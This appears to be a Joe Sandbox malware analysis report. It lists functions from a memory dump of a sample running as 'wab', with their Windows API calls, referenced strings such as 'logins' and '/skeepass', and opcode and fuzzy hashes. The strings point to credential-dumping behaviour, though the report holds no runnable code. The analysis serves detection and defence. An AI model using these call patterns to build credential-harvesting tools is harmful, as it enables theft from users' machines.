                                                                                                                                                                                                                    • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 667068680-2887671607
                                                                                                                                                                                                                    • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040FB5D Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 185COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                                                                    • API String ID: 1607361635-601624466
                                                                                                                                                                                                                    • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041019A Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 122COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                                                                                    • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                                                                                    • API String ID: 2000436516-3842416460
                                                                                                                                                                                                                    • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                    • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004035AD Relevance: 27.1, APIs: 18, Instructions: 93windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                      • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                      • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                      • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                      • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                                                                                    • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1043902810-0
                                                                                                                                                                                                                    • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                    • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004447D9 Relevance: 26.4, APIs: 4, Strings: 11, Instructions: 139COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                                                                                    • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                                                                                    • API String ID: 2899246560-1542517562
                                                                                                                                                                                                                    • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                    • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040DBA7 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 95COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBCD
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040DBE9
                                                                                                                                                                                                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                                                                                      • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                                                                                      • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                                                                                                                                    • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                                                                                                                                    • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                                                                                                                                    • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                                                                                                                                    • API String ID: 3330709923-517860148
                                                                                                                                                                                                                    • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                    • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00407FDF Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 228COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                      • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                      • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040806A
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040807F
                                                                                                                                                                                                                    • _wtoi.MSVCRT ref: 004081AF
                                                                                                                                                                                                                    • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004081E4
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                                                                                                                                      • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$ChangeCloseFileFindNotificationSize_wtoi_wtoi64wcscpy
                                                                                                                                                                                                                    • String ID: logins$null
                                                                                                                                                                                                                    • API String ID: 3492182834-2163367763
                                                                                                                                                                                                                    • Opcode ID: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                    • Instruction ID: fdf7b148d119976dec4a4ca0125bd44813aaa3c4ab878784613783167982a03f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09a376002f14fa1f9e0d48ac719059c44ef41498ede045729c177772a5669da3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48713371904219AEEF10BBA2DD82DDF767DEF00318F10457FB508B61C2DA785E458BA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408560 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 182stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040859D
                                                                                                                                                                                                                      • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085CF
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004085F1
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00408606
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 00408645
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004086DB
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004086FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040870E
                                                                                                                                                                                                                    • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0040879D
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                                                    • String ID: ---
                                                                                                                                                                                                                    • API String ID: 3437578500-2854292027
                                                                                                                                                                                                                    • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                    • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041083A Relevance: 21.1, APIs: 14, Instructions: 137windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0041087D
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00410892
                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                                                                    • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                                                                    • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                                                                    • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1010922700-0
                                                                                                                                                                                                                    • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                    • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418680 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 88COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                                                                                                                                                                                    • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                                                                                    • malloc.MSVCRT ref: 004186FE
                                                                                                                                                                                                                    • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$FullNamePath$malloc$Version
                                                                                                                                                                                                                    • String ID: |A
                                                                                                                                                                                                                    • API String ID: 4233704886-1717621600
                                                                                                                                                                                                                    • Opcode ID: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                                                                                                                                                                                                    • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 120bca0df7996060a851268a0569be7b62d1400f73c55317773b03da867e4687
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004125F8 Relevance: 21.1, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _wcsicmp
                                                                                                                                                                                                                    • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                                                                                    • API String ID: 2081463915-1959339147
                                                                                                                                                                                                                    • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004138C1 Relevance: 21.0, APIs: 6, Strings: 6, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                      • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                      • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                                                                                      • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000009.00000002.49636736037.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                                                                                    • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                    • API String ID: 2012295524-70141382
                                                                                                                                                                                                                    • Opcode ID: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
                                                                                                                                                                                                                    • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: de34bece31b7142a998ab6ccb1b4abbedb6e98f3c738f5240e3b00242a7e4309
